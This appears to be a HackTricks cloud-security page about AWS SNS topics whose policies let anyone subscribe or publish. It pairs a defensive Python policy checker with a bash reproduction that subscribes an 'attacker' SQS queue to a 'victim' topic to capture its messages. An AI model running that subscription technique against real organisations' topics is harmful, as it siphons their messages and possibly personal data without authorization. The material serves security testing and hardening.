
# AWS - SNS Unauthenticated Enum

{{#include ../../../../banners/hacktricks-training.md}}

## SNS

For more information about SNS check:

{{#ref}} ../../aws-services/aws-sns-enum.md {{#endref}}

## Open to everyone

When configuring an SNS topic from the web console it is possible to mark that Everyone can publish and subscribe to the topic:

So, if you find the ARN of topics inside the account (or by brute-forcing potential topic names) you can check whether you are able to publish or subscribe to them.

This is equivalent to an SNS topic resource policy that allows sns:Subscribe for * (or for external accounts): any principal can then create a subscription that delivers all of the topic's future messages to an SQS queue that the principal owns. When the queue owner initiates the subscription, no human confirmation step is required for SQS endpoints.
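As an added defender-side check (not code from the original page or from HackTricks), the script below parses an SNS topic Policy document, i.e. the JSON returned by `aws sns get-topic-attributes`, and flags Allow statements that grant sns:Subscribe or sns:Publish to a wildcard principal without any Condition. It also shows why a plain grep for `"*"` is not enough: the console's default policy uses a wildcard principal but scopes it to the owning account with an AWS:SourceOwner condition. The sample policies, the account id 111111111111 and the topic ARN are constructed placeholders.

```python
import json

# Actions that let an outside principal read from (Subscribe) or write to (Publish) the topic.
RISKY_ACTIONS = {"sns:subscribe", "sns:publish", "sns:*", "*"}


def _as_list(value):
    """IAM policy fields may be a scalar or a list; normalise to a list."""
    if value is None:
        return []
    return value if isinstance(value, list) else [value]


def _is_wildcard_principal(principal):
    """True for Principal "*" or Principal {"AWS": "*"} (also when given as a list)."""
    if principal == "*":
        return True
    if isinstance(principal, dict):
        return "*" in _as_list(principal.get("AWS"))
    return False


def find_open_statements(policy_doc):
    """Return [(Sid, [risky actions])] for every Allow statement that grants a
    risky SNS action to a wildcard principal with no Condition at all.
    Any present Condition (e.g. AWS:SourceOwner on the console default policy)
    is treated as narrowing by this coarse check and left for manual review."""
    policy = json.loads(policy_doc)
    findings = []
    for stmt in _as_list(policy.get("Statement")):
        if stmt.get("Effect") != "Allow":
            continue
        if not _is_wildcard_principal(stmt.get("Principal")):
            continue
        if stmt.get("Condition"):
            continue
        risky = [a for a in _as_list(stmt.get("Action")) if a.lower() in RISKY_ACTIONS]
        if risky:
            findings.append((stmt.get("Sid", "<no Sid>"), risky))
    return findings


def check_topic_attributes(get_topic_attributes_output):
    """Accept the JSON printed by `aws sns get-topic-attributes` and check its Policy."""
    attrs = json.loads(get_topic_attributes_output)["Attributes"]
    return find_open_statements(attrs.get("Policy", '{"Statement":[]}'))


# Constructed sample policies (placeholder account id and topic ARN).
TOPIC_ARN = "arn:aws:sns:us-east-1:111111111111:example-topic"

OPEN_SUBSCRIBE_POLICY = json.dumps({
    "Version": "2012-10-17",
    "Statement": [{
        "Sid": "OpenSubscribe", "Effect": "Allow", "Principal": "*",
        "Action": "sns:Subscribe", "Resource": TOPIC_ARN}]})

# Shape of the policy the console generates by default: wildcard principal, but
# scoped to the owning account by AWS:SourceOwner, so it must not be reported.
DEFAULT_STYLE_POLICY = json.dumps({
    "Version": "2008-10-17",
    "Statement": [{
        "Sid": "__default_statement_ID", "Effect": "Allow",
        "Principal": {"AWS": "*"},
        "Action": ["SNS:Publish", "SNS:Subscribe", "SNS:GetTopicAttributes"],
        "Resource": TOPIC_ARN,
        "Condition": {"StringEquals": {"AWS:SourceOwner": "111111111111"}}}]})

# Constructed get-topic-attributes output wrapping a policy that lets anyone publish.
OPEN_PUBLISH_ATTRS = json.dumps({"Attributes": {"Policy": json.dumps({
    "Version": "2012-10-17",
    "Statement": [{
        "Sid": "OpenPublish", "Effect": "Allow", "Principal": {"AWS": ["*"]},
        "Action": ["sns:Publish", "sns:GetTopicAttributes"], "Resource": TOPIC_ARN}]})}})

if __name__ == "__main__":
    for name, doc in [("open-subscribe", OPEN_SUBSCRIBE_POLICY),
                      ("default-style", DEFAULT_STYLE_POLICY)]:
        print(name, find_open_statements(doc) or "no open statements")
    print("open-publish", check_topic_attributes(OPEN_PUBLISH_ATTRS))
```

In an inventory run you would feed `check_topic_attributes` the output of `aws sns get-topic-attributes --topic-arn <arn>` for every topic returned by `aws sns list-topics`; any finding means the topic accepts subscriptions or publishes from arbitrary accounts and its policy should be scoped to specific principals, or to the account via AWS:SourceOwner or aws:PrincipalOrgID.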

<details>
<summary>Repro (us-east-1)</summary>

```bash
REGION=us-east-1

# Victim account (topic owner)
VICTIM_TOPIC_ARN=$(aws sns create-topic --name exfil-victim-topic-$(date +%s) --region $REGION --query TopicArn --output text)

# Open the topic to anyone subscribing
cat > /tmp/topic-policy.json <<JSON
{"Version":"2012-10-17","Statement":[{"Sid":"OpenSubscribe","Effect":"Allow","Principal":"*","Action":"sns:Subscribe","Resource":"$VICTIM_TOPIC_ARN"}]}
JSON
aws sns set-topic-attributes --region $REGION --topic-arn "$VICTIM_TOPIC_ARN" --attribute-name Policy --attribute-value file:///tmp/topic-policy.json

# Attacker account (queue owner)
ATTACKER_Q_URL=$(aws sqs create-queue --queue-name attacker-exfil-queue-$(date +%s) --region $REGION --query QueueUrl --output text)
ATTACKER_Q_ARN=$(aws sqs get-queue-attributes --queue-url "$ATTACKER_Q_URL" --region $REGION --attribute-names QueueArn --query Attributes.QueueArn --output text)

# Allow the victim topic to send to the attacker queue
cat > /tmp/sqs-policy.json <<JSON
{"Version":"2012-10-17","Statement":[{"Sid":"AllowVictimTopicSend","Effect":"Allow","Principal":{"Service":"sns.amazonaws.com"},"Action":"sqs:SendMessage","Resource":"$ATTACKER_Q_ARN","Condition":{"ArnEquals":{"aws:SourceArn":"$VICTIM_TOPIC_ARN"}}}]}
JSON
aws sqs set-queue-attributes --queue-url "$ATTACKER_Q_URL" --region $REGION --attributes Policy="$(cat /tmp/sqs-policy.json)"

# Subscribe the attacker queue to the victim topic (auto-confirmed for SQS)
SUB_ARN=$(aws sns subscribe --region $REGION --topic-arn "$VICTIM_TOPIC_ARN" --protocol sqs --notification-endpoint "$ATTACKER_Q_ARN" --query SubscriptionArn --output text)

# Validation: publish and receive
aws sns publish --region $REGION --topic-arn "$VICTIM_TOPIC_ARN" --message '{pii:ssn:123-45-6789}'
aws sqs receive-message --queue-url "$ATTACKER_Q_URL" --region $REGION --max-number-of-messages 1 --wait-time-seconds 10 --query 'Messages[0].Body' --output text
```

</details>
